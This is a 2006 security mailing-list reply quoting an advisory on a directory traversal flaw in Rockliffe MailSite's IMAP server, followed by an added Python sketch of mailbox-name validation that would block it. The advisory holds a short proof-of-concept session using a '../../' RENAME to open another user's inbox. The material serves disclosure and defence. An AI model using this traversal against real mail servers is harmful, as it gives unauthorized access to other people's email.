Date: Wed, 4 Jan 2006 12:03:40 -0500
From: Stan Bubrouski <stan.bubrouski@...il.com>
To: Josh Zlatin <jzlatin@...at.cc>
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Re: Rockliffe Directory Transversal Vulnerability


Seeing as most IMAP servers allow you to use ../../ with SELECT, etc.
(think uw-imapd for example) I think I would categorize this as more
of a permissions problem.

-sb

On 1/4/06, Josh Zlatin <jzlatin@...at.cc> wrote:
> Synopsis: Rockliffe's Mailsite Imap Directory Transversal Vulnerability.
>
> Product: Rockliffe Mailsite
>          http://www.rockliffe.com
>
> Version: Confirmed on Mailsite < 6.1.22.1
>
> Author: Josh Zlatin-Amishav
>
> Date: January 4, 2006
>
> Background:
> Rockliffe MailSite secure email server software and MailSite MP secure email
> gateways provide email server solutions and gateway email protection for
> businesses and service providers. Rockliffe has more than 3,000 customers
> hosting more than 15 million mailboxes worldwide.
>
> Issue:
> In working with researchers at Tenable Network Security, I have come across
> a directory traversal flaw in the IMAP server. It is possible for an
> authenticated user to access any user's inbox via a RENAME command.
>
> PoC:
>
> josh@...1:~$ telnet 10.0.0.5 143
> Trying 10.0.0.5...
> Connected to 10.0.0.5.
> Escape character is '^]'.
> * OK  MailSite IMAP4 Server 6.1.22.0 ready
> a1 login joe pass
> a1 OK LOGIN completed
> a2 rename ../../josh/INBOX gotcha
> a2 OK RENAME folder ../../josh/INBOX renamed to gotcha
> a3 select gotcha
> * FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
> * 0 EXISTS
> * 0 RECENT
> * OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)]
> * OK [UNSEEN 0]
> * OK [UIDVALIDITY 514563061] UIDs are valid
> a3 OK [READ-WRITE] opened gotcha
>
> user joe can now access the contents of user josh's INBOX directory.
>
> Vendor notified: January 3, 2006 06:12AM
>
> Vendor Response:
> Contact your sales rep about purchasing Mailsite 7.0.3.1
>
> Solution:
> Mailsite fixed a buffer overrun in the Mailsite IMAP server which also fixes
> the directory traversal problem. Either upgrade to version 6.1.22 and install
> the hotfix (i.e. upgrade to 6.1.22.1), or install the latest version of
> Mailsite. The hotfix can be obtained at:
>
> ftp://ftp.rockliffe.com/MailSite/6.1.22/Hotfixes/MailSiteServicePack.exe
>
> References: http://www.rockliffe.com
> References: http://zur.homelinux.com/Advisories/RockliffeMailsiteDirTransveral.txt
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
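
Added example, not part of the original thread and not MailSite or uw-imapd code: a sketch of the server-side mailbox-name check that would refuse the `a2 rename ../../josh/INBOX gotcha` request from the quoted session. The function names, the `/srv/mail` root and the one-directory-per-user store layout are assumptions made for illustration.

```python
import posixpath


class MailboxNameError(ValueError):
    """Raised when a client-supplied mailbox name is not acceptable."""


def resolve_mailbox(mail_root, user, name):
    """Map an IMAP mailbox name to a path inside mail_root/user, or raise.

    Assumes `user` is the already-authenticated login name, validated elsewhere.
    """
    # Treat "\" like "/" so Windows-style separators cannot smuggle a component.
    parts = name.replace("\\", "/").split("/")
    # Reject empty, "." and ".." components; this also rejects absolute names.
    if any(p in ("", ".", "..") for p in parts):
        raise MailboxNameError("illegal path component in %r" % name)
    # Reject control characters and drive/stream separators.
    if any(ord(c) < 0x20 or c == ":" for c in name):
        raise MailboxNameError("illegal character in %r" % name)
    base = posixpath.normpath(posixpath.join(mail_root, user))
    candidate = posixpath.normpath(posixpath.join(base, *parts))
    # Defence in depth: the normalised result must still sit under the user's root.
    if posixpath.commonpath([base, candidate]) != base or candidate == base:
        raise MailboxNameError("mailbox escapes user root: %r" % name)
    return candidate


def rename_response(tag, mail_root, user, old, new):
    """Validate BOTH arguments of RENAME before any filesystem call."""
    try:
        src = resolve_mailbox(mail_root, user, old)
        dst = resolve_mailbox(mail_root, user, new)
    except MailboxNameError:
        return "%s NO RENAME failed: invalid mailbox name" % tag
    # A real server would rename src to dst here; this sketch only reports the decision.
    return "%s OK RENAME %s -> %s" % (tag, src, dst)


if __name__ == "__main__":
    ROOT = "/srv/mail"  # constructed example root
    print(rename_response("a2", ROOT, "joe", "../../josh/INBOX", "gotcha"))
    print(rename_response("a2", ROOT, "joe", "Drafts", "Archive/Drafts"))
```

The same resolver belongs in front of every command that takes a mailbox name (SELECT, CREATE, DELETE, RENAME and so on), so that no single command is left as the unchecked path.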